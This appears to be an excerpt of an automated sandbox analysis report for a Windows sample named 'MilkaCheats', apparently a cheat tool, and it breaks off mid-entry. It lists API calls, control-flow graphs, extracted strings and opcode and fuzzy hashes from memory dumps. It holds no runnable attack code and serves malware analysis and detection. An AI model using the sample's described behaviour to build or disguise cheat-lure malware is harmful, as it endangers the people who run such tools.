                                                                                              • API ID: Heap$Process$AllocConsoleDeleteFileFreeHandleProtectVirtualWrite_strlenwsprintf
                                                                                              • String ID: Window1$static.lib
                                                                                              • API String ID: 523815168-642987920

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 000E0EE1: CreateFileW.KERNELBASE(?,00000000,?,000E12D1,?,?,00000000,?,000E12D1,?,0000000C), ref: 000E0EFE
                                                                                              • GetLastError.KERNEL32 ref: 000E133C
                                                                                              • __dosmaperr.LIBCMT ref: 000E1343
                                                                                              • GetFileType.KERNELBASE(00000000), ref: 000E134F
                                                                                              • GetLastError.KERNEL32 ref: 000E1359
                                                                                              • __dosmaperr.LIBCMT ref: 000E1362
                                                                                              • CloseHandle.KERNEL32(00000000), ref: 000E1382
                                                                                              • CloseHandle.KERNEL32(000DA86B), ref: 000E14CF
                                                                                              • GetLastError.KERNEL32 ref: 000E1501
                                                                                              • __dosmaperr.LIBCMT ref: 000E1508
                                                                                              Strings
                                                                                              Similarity
                                                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                              • String ID: H
                                                                                              • API String ID: 4237864984-2852464175

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                                • Part of subcall function 000D63AA: GetConsoleOutputCP.KERNEL32(865EA617,00000000,00000000,00000000), ref: 000D640D
                                                                                              • WriteFile.KERNEL32(?,00000000,?,000EDA30,00000000,0000000C,00000000,00000000,00000000,00000000,000EDA30,00000010,000CCBA0,00000000,00000000,00000000), ref: 000D6E00
                                                                                              • GetLastError.KERNEL32 ref: 000D6E0A
                                                                                              Similarity
                                                                                              • API ID: ConsoleErrorFileLastOutputWrite
                                                                                              • String ID:
                                                                                              • API String ID: 2915228174-0

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • WriteFile.KERNELBASE(?,?,?,?,00000000,00000000,00000000,00000000,?,000D6DE6,00000000,00000000,00000000,?,0000000C,00000000), ref: 000D68FE
                                                                                              • GetLastError.KERNEL32(?,000D6DE6,00000000,00000000,00000000,?,0000000C,00000000,00000000,00000000,00000000,000EDA30,00000010,000CCBA0,00000000,00000000), ref: 000D6924
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastWrite
                                                                                              • String ID:
                                                                                              • API String ID: 442123175-0
                                                                                              • Opcode ID: 12e82836c2984419c817d67d2f0e4ffca2b307548a521f161c7c11d92c1a474d
                                                                                              • Instruction ID: c86f80050f239872bb39c21c23e125c27749ebb7ff27fbda28b30580a61eb3ac
                                                                                              • Opcode Fuzzy Hash: 12e82836c2984419c817d67d2f0e4ffca2b307548a521f161c7c11d92c1a474d
                                                                                              • Instruction Fuzzy Hash: F2218D35A002199BDF15CF29DC90AEDB7B9EB4D301B1441AAEA46D7311DB31DE82CB64

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 187 d6085-d6099 call dc35e 190 d609f-d60a7 187->190 191 d609b-d609d 187->191 193 d60a9-d60b0 190->193 194 d60b2-d60b5 190->194 192 d60ed-d610d call dc2cd 191->192 202 d611f 192->202 203 d610f-d611d call d02d7 192->203 193->194 195 d60bd-d60d1 call dc35e * 2 193->195 196 d60b7-d60bb 194->196 197 d60d3-d60e3 call dc35e CloseHandle 194->197 195->191 195->197 196->195 196->197 197->191 209 d60e5-d60eb GetLastError 197->209 207 d6121-d6124 202->207 203->207 209->192
                                                                                              APIs
                                                                                              • CloseHandle.KERNELBASE(00000000,00000000,CF830579,?,000D5F6C,00000000,CF830579,000ED9D0,0000000C,000D6028,000CBBC1,?), ref: 000D60DB
                                                                                              • GetLastError.KERNEL32(?,000D5F6C,00000000,CF830579,000ED9D0,0000000C,000D6028,000CBBC1,?), ref: 000D60E5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: CloseErrorHandleLast
                                                                                              • String ID:
                                                                                              • API String ID: 918212764-0
                                                                                              • Opcode ID: 38bf3c9ce77df6be327681917484391f57ef49817df30dd93a70f702d620aaa5
                                                                                              • Instruction ID: c0f9081ba955da4bd718d249d381e8fa18ddf8323f2099088cf8fdee75f26886
                                                                                              • Opcode Fuzzy Hash: 38bf3c9ce77df6be327681917484391f57ef49817df30dd93a70f702d620aaa5
                                                                                              • Instruction Fuzzy Hash: 4C1129336003201AE6645674A846BBF7B894B82730F29411BF9188B3D3DB77998096F0

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 212 da82c-da852 call da602 215 da8ab-da8ae 212->215 216 da854-da866 call e1208 212->216 218 da86b-da870 216->218 218->215 219 da872-da8aa 218->219
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: __wsopen_s
                                                                                              • String ID:
                                                                                              • API String ID: 3347428461-0
                                                                                              • Opcode ID: df35664125bcee942bbdcf641e23f3a11c6838a11d44c6808425e528eb912694
                                                                                              • Instruction ID: 0130b9eb889c3846403d1088f0aa1e39af93db5a8fac3a13545a411418fe508e
                                                                                              • Opcode Fuzzy Hash: df35664125bcee942bbdcf641e23f3a11c6838a11d44c6808425e528eb912694
                                                                                              • Instruction Fuzzy Hash: 6F1103B1A0420AAFCB05DF58E94599A7BF5EF49304F05406AF809AB352DA70EE118B65

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 220 d8614-d8620 221 d8652-d865d call d030e 220->221 222 d8622-d8624 220->222 230 d865f-d8661 221->230 223 d863d-d864e RtlAllocateHeap 222->223 224 d8626-d8627 222->224 226 d8629-d8630 call d3251 223->226 227 d8650 223->227 224->223 226->221 232 d8632-d863b call d0e6d 226->232 227->230 232->221 232->223
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,00000000,?,?,00000003,000CB4F2,?,000CB461,?,00000000,000CB670), ref: 000D8646
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              • Opcode ID: d40529a67401b191264b9242efe1738f0a842b1749afef022a78819ab6d72a93
                                                                                              • Instruction ID: c5fae73c44c1bda15d102d5d6932dfc22a39c2e0cdf78cb47a042986bc50fbf3
                                                                                              • Opcode Fuzzy Hash: d40529a67401b191264b9242efe1738f0a842b1749afef022a78819ab6d72a93
                                                                                              • Instruction Fuzzy Hash: 39E0ED316013205AEA712A219C11BAE378CAB817B0F158973AC55A6392CF20CD0087B4

                                                                                              Control-flow Graph

                                                                                              control_flow_graph 235 e0ee1-e0f05 CreateFileW
                                                                                              APIs
                                                                                              • CreateFileW.KERNELBASE(?,00000000,?,000E12D1,?,?,00000000,?,000E12D1,?,0000000C), ref: 000E0EFE
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: 55e8fd548351fcf93d452e997c4b8dc89457dfb08ae087a1af75f8abb56c6ed7
                                                                                              • Instruction ID: 0b0307b7c416feb99e73d3e278903726ad78f207ad38cef893f04eb32ef106ed
                                                                                              • Opcode Fuzzy Hash: 55e8fd548351fcf93d452e997c4b8dc89457dfb08ae087a1af75f8abb56c6ed7
                                                                                              • Instruction Fuzzy Hash: 6ED06C3200014DBBDF029F84DC46EDA3BAAFB48714F024040BA1866020C736E861AB90
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: ($+$-$/$0$1$2$3$4$8$8$9$9$;$<$=$>$?$?$@$A$B$C$E$G$H$I$K$M$O$Q$S$S$U$W$Y$[$\$]$_$a$c$e$g$i$k$m$o$q$s$u$w$x$y${$|$|$}
                                                                                              • API String ID: 0-901420310
                                                                                              • Opcode ID: 9ff95fa98a9c8fa0834cb8fa355381c427a5d401ca1c5a4a17797ec6589dbca1
                                                                                              • Instruction ID: b5da1afea6ee4abb37875f2c75b8de69be8e98d241b9df737dd44b98ed3b5671
                                                                                              • Opcode Fuzzy Hash: 9ff95fa98a9c8fa0834cb8fa355381c427a5d401ca1c5a4a17797ec6589dbca1
                                                                                              • Instruction Fuzzy Hash: A42250219087E98DDB32C67C8C087DDBEA15B67324F0843D9D1E96B2D2C7B50B85CB66
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: !$#$$$%$'$)$+$-$/$0$1$3$4$5$7$9$;$<$=$>$?$@$A$E$E$G$H$M$X$Y$[$h$r$s$t
                                                                                              • API String ID: 0-3672740722
                                                                                              • Opcode ID: 4ae2ef22dd5cd9d85fad40d90f2d2a0374cb7241c5e71f4f93d0151e211f1b03
                                                                                              • Instruction ID: 47ff10d35f9d31662f33744cf0156f3960a6821bd779658f5aecadf2a28918c5
                                                                                              • Opcode Fuzzy Hash: 4ae2ef22dd5cd9d85fad40d90f2d2a0374cb7241c5e71f4f93d0151e211f1b03
                                                                                              • Instruction Fuzzy Hash: EEE19221D087E98EDB26CA7C880839DBFB16B52314F1842DDD4E9AB3C3D7754A45CB62
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: G"A$&+$*$/E;C$/$$2A"_$@C$O\$SX$_Y$h#j=$i'd!$lF$m9O7$pq$r3$31
                                                                                              • API String ID: 0-2321160229
                                                                                              • Opcode ID: b8f049ba8096286ec80d62931fdf588bc9f44c0889362310616f571f3e6783b2
                                                                                              • Instruction ID: 3ba6480c4f637bd6eefa8aecf51e9ba813b53f619b261f7a1cd397dcae0303f3
                                                                                              • Opcode Fuzzy Hash: b8f049ba8096286ec80d62931fdf588bc9f44c0889362310616f571f3e6783b2
                                                                                              • Instruction Fuzzy Hash: A842D8B414D3858AE374CF169581BCFBAE1BB92304F208E2DC2E95B255DB74814ACF93
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: &A-C$5Q<S$6$6E+G$7U9W$8]S_$<Y?[$>M"O$E-A/$I)^+$M%E'$O9M;$P!N#$dc$eI?K$jabc
                                                                                              • API String ID: 0-600622405
                                                                                              • Opcode ID: 5401dd7d73687538b39f8a60e941c4ee8bd7b6e3a78600276bbf727d0c8ab92a
                                                                                              • Instruction ID: 00ec5d62ddf2ce750e35bcf0f535e0ae5a195159dd2f938a76e4c1588e35c41c
                                                                                              • Opcode Fuzzy Hash: 5401dd7d73687538b39f8a60e941c4ee8bd7b6e3a78600276bbf727d0c8ab92a
                                                                                              • Instruction Fuzzy Hash: 92D1247160C3958BC320CF24D4903AFBBE2ABD2704F18892EE5D54B751D775D90AEB92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: &?3$,/.1$3210$4761$8;:5$8?$L$RdOh$X[Z]$dgfi$h$mdOh$w`k
                                                                                              • API String ID: 0-3944949542
                                                                                              • Opcode ID: 27a7076405f7ae26ad8b1691d0a2ed41cf52535f449cd577730d3fbcc9e02e51
                                                                                              • Instruction ID: f40a927ca9f87adfeab739f33eb40bee4736c4fb55e5707dbbffaee027026a89
                                                                                              • Opcode Fuzzy Hash: 27a7076405f7ae26ad8b1691d0a2ed41cf52535f449cd577730d3fbcc9e02e51
                                                                                              • Instruction Fuzzy Hash: 6DB2D07160C3818BD734CF25C4917ABBBE2AFD6304F188D6DE4C98B292D7B58905CB92
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: 0$0$0$0000$0000$0000$0000$0000$0000$0000$@$i
                                                                                              • API String ID: 0-3385986306
                                                                                              • Opcode ID: 86df71254f412a11028d550705ac35df7369e2e6aca90a7abbc0bff00b8b010c
                                                                                              • Instruction ID: c541a0be6efafc79654246c2e0d0d5062919f6a888884b5743c5197600410779
                                                                                              • Opcode Fuzzy Hash: 86df71254f412a11028d550705ac35df7369e2e6aca90a7abbc0bff00b8b010c
                                                                                              • Instruction Fuzzy Hash: F382F275A0D3858FD718CF28C49036ABBE1AB85304F18CA6DE6DA87792D374DD05DB82
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: Y^S$Y^S$#g>#$#g>#$$*- $$*- $UjcW$UjcW$YRTP$o$ $o$
                                                                                              • API String ID: 0-2828925941
                                                                                              • Opcode ID: e80b0cc4059dca3e0b6f5f179f323d24d1a659c15c83aa546cd6fdcad424a146
                                                                                              • Instruction ID: 3abf93f93d61eb77426b10fca0249c3b5e0da36510406cf68925d428b0ece3a0
                                                                                              • Opcode Fuzzy Hash: e80b0cc4059dca3e0b6f5f179f323d24d1a659c15c83aa546cd6fdcad424a146
                                                                                              • Instruction Fuzzy Hash: CC81BF3164C3858BD7388FA484913EBBBF1AF96340F14996DD4DA8B382D7309949DB62
                                                                                              APIs
                                                                                              • GetLocaleInfoW.KERNEL32(?,2000000B,,00000002,00000000,?,?,?,000DE5EE,?,00000000), ref: 000DE369
                                                                                              • GetLocaleInfoW.KERNEL32(?,20001004,,00000002,00000000,?,?,?,000DE5EE,?,00000000), ref: 000DE392
                                                                                              • GetACP.KERNEL32(?,?,000DE5EE,?,00000000), ref: 000DE3A7
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: InfoLocale
                                                                                              • String ID: ACP$OCP$
                                                                                              • API String ID: 2299586839-755115278
                                                                                              • Opcode ID: 17cdbac1c65c1084c85c7fb3862f2bf14850628126215e89a250d061943e434e
                                                                                              • Instruction ID: a313f572fcde340f5b5853a2211364eb5c24712f214846039d5b2382732b54c3
                                                                                              • Opcode Fuzzy Hash: 17cdbac1c65c1084c85c7fb3862f2bf14850628126215e89a250d061943e434e
                                                                                              • Instruction Fuzzy Hash: E021B822A00380EBDB74AF55C949ABB73E6AB50B54B5A4426E94ADF300E732DF40D370
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: $ $ $ $ $ $
                                                                                              • API String ID: 0-935225467
                                                                                              • Opcode ID: b254aa17cc46d80bf86c8579fc0bf1715e3884e9fc4ec05af717202ccc13fb02
                                                                                              • Instruction ID: cf78bafc5f4fd8ff70626d320a1130145519996e21a26f2f62589d437de8e155
                                                                                              • Opcode Fuzzy Hash: b254aa17cc46d80bf86c8579fc0bf1715e3884e9fc4ec05af717202ccc13fb02
                                                                                              • Instruction Fuzzy Hash: 58A22431608386CFC728CF28C4942BABBE2AFD5354F18862DE5958BB91E735DC45DB81
                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: __floor_pentium4
                                                                                              • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                              • API String ID: 4168288129-2761157908
                                                                                              • Opcode ID: d312b11b7a29281cb47d62251e1854f02f27d653fa6dafc5e08d9f0bd033e3b0
                                                                                              • Instruction ID: ad21ff2f7c26683374adfea19baeae78cda5418de487442abb5a9b375bffc063
                                                                                              • Opcode Fuzzy Hash: d312b11b7a29281cb47d62251e1854f02f27d653fa6dafc5e08d9f0bd033e3b0
                                                                                              • Instruction Fuzzy Hash: FCD21971E086698FDB65CF28DD40BEAB7B5EB44304F1441EAD84EE7240DB74AE818F51
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: @ffI$itkj$q`h}$xy$yleh$uw
                                                                                              • API String ID: 0-3689917334
                                                                                              • Opcode ID: e20f88a561601b5f4ca72019cf5c033d39b5832eb0a3cf68ba31b152de778407
                                                                                              • Instruction ID: 5c5cc598524f123f5cfc10db71aa3fd6d32e6fb8d190ed283f7568aab79fa164
                                                                                              • Opcode Fuzzy Hash: e20f88a561601b5f4ca72019cf5c033d39b5832eb0a3cf68ba31b152de778407
                                                                                              • Instruction Fuzzy Hash: F7C1F1B02083889FE314DF65D88176FBBE4EBD2348F14892CE1D58B392D7798509CB96
                                                                                              APIs
                                                                                                • Part of subcall function 000D4200: GetLastError.KERNEL32(?,00000008,000D9825,00000000,000CB670), ref: 000D4204
                                                                                                • Part of subcall function 000D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 000D42A6
                                                                                              • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 000DE5B1
                                                                                              • IsValidCodePage.KERNEL32(00000000), ref: 000DE5FA
                                                                                              • IsValidLocale.KERNEL32(?,00000001), ref: 000DE609
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 000DE651
                                                                                              • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 000DE670
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                                              • String ID:
                                                                                              • API String ID: 415426439-0
                                                                                              • Opcode ID: 8b54e9aa391688c713403713be65fadef7e64e73dd09b10a55c29f52956bb76f
                                                                                              • Instruction ID: 7f60f70140d62dd80280ef4def0c485419fb0faeac91b6381aa6d5c53ec747b2
                                                                                              • Opcode Fuzzy Hash: 8b54e9aa391688c713403713be65fadef7e64e73dd09b10a55c29f52956bb76f
                                                                                              • Instruction Fuzzy Hash: E0518F71A00745ABEB50EFA5EC81ABE77F8AF04744F18446AE910EF295EB70D9408B71
                                                                                              APIs
                                                                                                • Part of subcall function 000D4200: GetLastError.KERNEL32(?,00000008,000D9825,00000000,000CB670), ref: 000D4204
                                                                                                • Part of subcall function 000D4200: SetLastError.KERNEL32(00000000,00000005,000000FF), ref: 000D42A6
                                                                                              • GetACP.KERNEL32(?,?,?,?,?,?,000D22E5,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 000DDC02
                                                                                              • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,000D22E5,?,?,?,00000055,?,-00000050,?,?), ref: 000DDC2D
                                                                                              • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 000DDD90
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                                              • String ID: utf8
                                                                                              • API String ID: 607553120-905460609
                                                                                              • Opcode ID: 14f0393ada8af5ab1f540883df9a20f0159d1b152dcbeec3cafda01dd7f5e0a0
                                                                                              • Instruction ID: 06b86b03346fafcaa6d0867307113521f5948e8027fe27f881f017e0d3d6b8a9
                                                                                              • Opcode Fuzzy Hash: 14f0393ada8af5ab1f540883df9a20f0159d1b152dcbeec3cafda01dd7f5e0a0
                                                                                              • Instruction Fuzzy Hash: D371D371A04306AADB24AB75CC46BBA77E9EF44714F14446BF505DB382EBB0E940C774
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862544262.00000000000C1000.00000020.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862576042.00000000000E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862639501.0000000000141000.00000040.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862659456.0000000000142000.00000004.00000001.01000000.00000003.sdmp
                                                                                              • Associated: 00000000.00000002.1862679114.0000000000144000.00000002.00000001.01000000.00000003.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_c0000_MilkaCheats.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID: "#<$8977$InA>$InA>$f
                                                                                              • API String ID: 0-3216925240
                                                                                              • Opcode ID: 4390526fb2d9361e3e861b090892f1eaa3d55a8709e4123d052abd61ee78d48e
                                                                                              • Instruction ID: 83f6f897595d3db07a1e416046051c59fdc96e2492095f2faaa22e0faf8790a9
                                                                                              • Opcode Fuzzy Hash: 4390526fb2d9361e3e861b090892f1eaa3d55a8709e4123d052abd61ee78d48e
                                                                                              • Instruction Fuzzy Hash: E522B1756083519FC718CF29E890A2BBBE2BFC9314F298A2DF89587391D734D855CB42
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.1862597920.00000000000EF000.00000004.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                                                              • Associated: 00000000.00000002.1862521444.00000000000C0000.00000002.00000001.01000000.00000003.sdmp
